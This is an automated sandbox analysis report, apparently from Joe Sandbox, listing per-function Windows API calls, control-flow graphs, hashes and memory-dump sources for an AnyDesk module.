                                                                                                                                                                                                                                                  • API String ID: 3660427363-0
                                                                                                                                                                                                                                                  • Opcode ID: 0e0dcf3a06f332375a8fd41fb260d34e5ce8fdf71cb5263dfd66e4866dd20c40
                                                                                                                                                                                                                                                  • Instruction ID: 945847d0c2a1fe7737680583e5622b7b848b7ad4bd9a9e00b7e101ae87c1b491
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e0dcf3a06f332375a8fd41fb260d34e5ce8fdf71cb5263dfd66e4866dd20c40
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46C08C323D4308BBEA201EB1CC03F203A6CEB12F11F300020B30AAC0E0C1A37020964D
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  control_flow_graph 139 69c5ffec-69c60019 call 69c2dcb0 call 69c5f310 144 69c602d7-69c602ef call 69c22e00 call 69c40c5d 139->144 145 69c6001f-69c60041 CoInitializeEx CoInitializeSecurity 139->145 146 69c60047-69c60057 call 69c5f4f1 145->146 147 69c602cb-69c602cf 145->147 154 69c601cd-69c60203 call 69c288e0 CoCreateInstance 146->154 155 69c6005d-69c60074 GetCurrentProcessId call 69c5f383 146->155 147->144 150 69c602d1 CoUninitialize 147->150 150->144 161 69c60205-69c60244 call 69c29690 call 69c24780 154->161 162 69c60253-69c6029b call 69c29690 call 69c3b650 call 69c3b6c0 call 69c3b630 call 69c3b620 call 69c24780 call 69c3b690 154->162 155->147 163 69c6007a-69c6009a GetShellWindow GetWindowThreadProcessId 155->163 184 69c60246-69c60251 161->184 185 69c6029e-69c602a5 161->185 162->185 165 69c6009c-69c600a8 LocalFree 163->165 166 69c600ad-69c600c0 call 69c5f383 163->166 165->147 175 69c600c6-69c600d8 call 69c56951 166->175 176 69c601b5-69c601c7 LocalFree 166->176 186 69c600de-69c60110 OpenProcess call 69c2eab0 call 69c2ea90 175->186 187 69c601ac-69c601af LocalFree 175->187 176->147 176->154 184->185 189 69c602a7-69c602ad RevertToSelf 185->189 190 69c602b0-69c602b8 185->190 202 69c60116-69c60139 OpenProcessToken 186->202 203 69c601a1-69c601a7 call 69c2eb30 186->203 187->176 189->190 195 69c602c0-69c602c6 call 69c28a00 190->195 196 69c602ba-69c602bc 190->196 195->147 196->195 205 69c6013b-69c60156 DuplicateTokenEx 202->205 206 69c60178-69c60184 202->206 203->187 205->206 209 69c60158-69c60172 ImpersonateLoggedOnUser 205->209 210 69c60186-69c6018c CloseHandle 206->210 211 69c6018e-69c60194 206->211 209->206 210->211 213 69c60196-69c6019c CloseHandle 211->213 214 69c6019e-69c601a0 211->214 213->214 214->203
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000002), ref: 69C60024
                                                                                                                                                                                                                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000002,00000000,00000040,00000000), ref: 69C60039
                                                                                                                                                                                                                                                  • CoUninitialize.OLE32 ref: 69C602D1
                                                                                                                                                                                                                                                    • Part of subcall function 69C5F4F1: GetCurrentProcess.KERNEL32(00000008,?), ref: 69C5F50F
                                                                                                                                                                                                                                                    • Part of subcall function 69C5F4F1: OpenProcessToken.ADVAPI32(00000000), ref: 69C5F516
                                                                                                                                                                                                                                                    • Part of subcall function 69C5F4F1: GetTokenInformation.ADVAPI32(?,00000012(TokenIntegrityLevel),?,00000004,00000000), ref: 69C5F53A
                                                                                                                                                                                                                                                    • Part of subcall function 69C5F4F1: CloseHandle.KERNEL32(?), ref: 69C5F547
                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?), ref: 69C60064
                                                                                                                                                                                                                                                    • Part of subcall function 69C5F383: OpenProcess.KERNEL32(00000400,00000001,?,00000000,00000000), ref: 69C5F396
                                                                                                                                                                                                                                                  • GetShellWindow.USER32 ref: 69C60087
                                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 69C6008E
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 69C600A2
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000440,00000001,?), ref: 69C600EA
                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(?,0000000A,?,00000000), ref: 69C60131
                                                                                                                                                                                                                                                  • DuplicateTokenEx.ADVAPI32(?,0000000F,00000000,00000002,00000001,?), ref: 69C6014E
                                                                                                                                                                                                                                                  • ImpersonateLoggedOnUser.ADVAPI32(?), ref: 69C6015E
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 69C6018C
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 69C6019C
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 69C601AF
                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 69C601BB
                                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(69C765CC,00000000,00000004,69C765BC,?,?), ref: 69C601F0
                                                                                                                                                                                                                                                  • RevertToSelf.ADVAPI32(00000001,00000000), ref: 69C602A7
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process$OpenToken$CloseFreeHandleLocal$CurrentInitializeWindow$CreateDuplicateImpersonateInformationInstanceLoggedRevertSecuritySelfShellThreadUninitializeUser
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1086148846-0
                                                                                                                                                                                                                                                  • Opcode ID: 10ecc39cefe7bb4abbc223a5bb1e4b4c320567f4369b426ef10159e1ce867620
                                                                                                                                                                                                                                                  • Instruction ID: 68cc1ed05980b6b1f7f75deaef84e7b05d464fa4efec92cb969bb7d423bffed3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 10ecc39cefe7bb4abbc223a5bb1e4b4c320567f4369b426ef10159e1ce867620
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3816E71900219AFEF20DFA2DC84FADBB79BF45314F4080A9E51AA6191EF319E45DF20
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C3D530: new.LIBCMT ref: 69C3D54D
                                                                                                                                                                                                                                                  • new.LIBCMT ref: 69C3B811
                                                                                                                                                                                                                                                  • SetHandleInformation.KERNEL32(00000000,00000001,00000001), ref: 69C3B8AA
                                                                                                                                                                                                                                                    • Part of subcall function 69C3B5D0: GetCurrentProcess.KERNEL32(00000001,?,00000001), ref: 69C3B5F4
                                                                                                                                                                                                                                                    • Part of subcall function 69C3FC31: std::invalid_argument::invalid_argument.LIBCONCRT ref: 69C3FC3D
                                                                                                                                                                                                                                                    • Part of subcall function 69C3FC31: __CxxThrowException@8.LIBVCRUNTIME ref: 69C3FC4B
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • invalid vector<T> subscript, xrefs: 69C3BE32
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CurrentException@8HandleInformationProcessThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID: invalid vector<T> subscript
                                                                                                                                                                                                                                                  • API String ID: 2615769013-3016609489
                                                                                                                                                                                                                                                  • Opcode ID: 617790d59962363e6e6bf5916b6e907fa640904acbda6f86427a1c2483ce745a
                                                                                                                                                                                                                                                  • Instruction ID: 8c794af2a06e340bb50a94d4b43c068a0dd750a6f243fb57b0a39a9494e1c23b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 617790d59962363e6e6bf5916b6e907fa640904acbda6f86427a1c2483ce745a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F127C356087509FE724CF25E850BABB7F4BF85318F80891DF4AA97290EB34E945CB52
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000), ref: 69C32A4E
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process), ref: 69C32A64
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 69C32A6B
                                                                                                                                                                                                                                                  • GetVersionExW.KERNEL32(0000011C), ref: 69C32AE0
                                                                                                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 69C32B3C
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressCurrentHandleInfoModuleNativeProcProcessSystemVersion
                                                                                                                                                                                                                                                  • String ID: GetProductInfo$IsWow64Process$kernel32.dll
                                                                                                                                                                                                                                                  • API String ID: 1167739923-1263506661
                                                                                                                                                                                                                                                  • Opcode ID: 2a1dd8215e88149a4d6b68c14a8ffe4a1eaec83c0b428c5542d0652ad9a70698
                                                                                                                                                                                                                                                  • Instruction ID: 71e747aa0bad0ac4c180a88fca31812594421f46ddc7cfc187df9c22ae987adb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2a1dd8215e88149a4d6b68c14a8ffe4a1eaec83c0b428c5542d0652ad9a70698
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7B617F70900628CBDF30CF69E9557EAB7F4EF09314F50059AE48AD7240EB75AA85CF81
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$_memcmp
                                                                                                                                                                                                                                                  • String ID: C
                                                                                                                                                                                                                                                  • API String ID: 789029625-1037565863
                                                                                                                                                                                                                                                  • Opcode ID: dc8688e25f6591bea681500c5bf1175f1984abc30a464b34f54fc7800f055a36
                                                                                                                                                                                                                                                  • Instruction ID: 2d931c5cab233094f4325a302aa18ac6df872e2f84f4bd594fdb945563f241af
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc8688e25f6591bea681500c5bf1175f1984abc30a464b34f54fc7800f055a36
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3202A175A052199BDB24CF18ECA4B9DB3F4FF48714F5081AAD80AA7250F731AEA1CF54
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 69C5B4EB
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 69C5B514
                                                                                                                                                                                                                                                  • GetACP.KERNEL32 ref: 69C5B529
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: GetLastError.KERNEL32(00000008,69C21DE7,69C4EBE2,69C45DC7), ref: 69C4FBB4
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _free.LIBCMT ref: 69C4FBE7
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC28
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _abort.LIBCMT ref: 69C4FC2E
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: _free.LIBCMT ref: 69C4FC0F
                                                                                                                                                                                                                                                    • Part of subcall function 69C4FBB0: SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC1C
                                                                                                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32 ref: 69C5B732
                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 69C5B78D
                                                                                                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 69C5B79C
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 69C5B7E4
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 69C5B803
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 745075371-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • FormatMessageA.KERNEL32(00001200,00000000,?,00000000,?,00000100,00000000,?,?), ref: 69C229D1
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,?,00000100,00000000,?,?), ref: 69C22B45
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • (0x%X), xrefs: 69C22A48
                                                                                                                                                                                                                                                  • Error (0x%X) while retrieving error. (0x%X), xrefs: 69C22B4C
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                  • String ID: (0x%X)$Error (0x%X) while retrieving error. (0x%X)
                                                                                                                                                                                                                                                  • API String ID: 3479602957-3758316108
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 69C505D6
                                                                                                                                                                                                                                                    • Part of subcall function 69C4CBA5: HeapFree.KERNEL32(00000000,00000000,?,69C5A020,00000000,00000000,00000000,00000000,?,69C5A2C4,00000000,00000007,00000000,?,69C58081,00000000), ref: 69C4CBBB
                                                                                                                                                                                                                                                    • Part of subcall function 69C4CBA5: GetLastError.KERNEL32(00000000,?,69C5A020,00000000,00000000,00000000,00000000,?,69C5A2C4,00000000,00000007,00000000,?,69C58081,00000000,00000000), ref: 69C4CBCD
                                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32 ref: 69C505E8
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,?,69C7EC4C,000000FF,?,0000003F,?,?), ref: 69C50660
                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,?,69C7ECA0,000000FF,?,0000003F,?,?,?,69C7EC4C,000000FF,?,0000003F,?,?), ref: 69C5068D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 806657224-0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 69C4FBB0: GetLastError.KERNEL32(00000008,69C21DE7,69C4EBE2,69C45DC7), ref: 69C4FBB4
  • Part of subcall function 69C4FBB0: _free.LIBCMT ref: 69C4FBE7
  • Part of subcall function 69C4FBB0: SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC28
  • Part of subcall function 69C4FBB0: _abort.LIBCMT ref: 69C4FC2E
  • Part of subcall function 69C4FBB0: _free.LIBCMT ref: 69C4FC0F
  • Part of subcall function 69C4FBB0: SetLastError.KERNEL32(00000000,00000008,69C21DE7), ref: 69C4FC1C
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 69C5B12D
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 69C5B17E
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 69C5B23E
Memory Dump Source
• Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
• Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
Similarity
• API ID: ErrorInfoLastLocale$_free$_abort
• String ID:
• API String ID: 2829624132-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 69C46084
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 69C4608E
• UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 69C4609B
Memory Dump Source
• Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
• Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetUserDefaultUILanguage.KERNEL32 ref: 69C3D21F
• GetLocaleInfoW.KERNEL32(?,00000059,?,00000009), ref: 69C3D23D
• GetLocaleInfoW.KERNEL32(?,0000005A,?,00000009,?,-00000001,?,00000059,?,00000009), ref: 69C3D284
Memory Dump Source
• Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
• Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
Similarity
• API ID: InfoLocale$DefaultLanguageUser
• String ID:
• API String ID: 1606347679-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 69C5F744
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 69C5F759
• FreeSid.ADVAPI32(?), ref: 69C5F769
Memory Dump Source
• Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
• Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2894015188.0000000069C81000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000013.00000002.2894045944.0000000069C83000.00000002.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_69c20000_AnyDesk.jbxd
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadResource.KERNEL32(?,?,?,69C62BE3,?,00000000,?,?,69C62C6F,?,?,?), ref: 69C62CF2
                                                                                                                                                                                                                                                  • LockResource.KERNEL32(00000000,00000A2F,?,69C62BE3,?,00000000,?,?,69C62C6F,?,?,?), ref: 69C62D00
                                                                                                                                                                                                                                                  • SizeofResource.KERNEL32(?,?,?,69C62BE3,?,00000000,?,?,69C62C6F,?,?,?), ref: 69C62D12
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2893845254.0000000069C21000.00000020.00000001.01000000.00000010.sdmp, Offset: 69C20000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893800951.0000000069C20000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893926198.0000000069C6A000.00000002.00000001.01000000.00000010.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2893978674.0000000069C7D000.00000004.00000001.01000000.00000010.sdmp
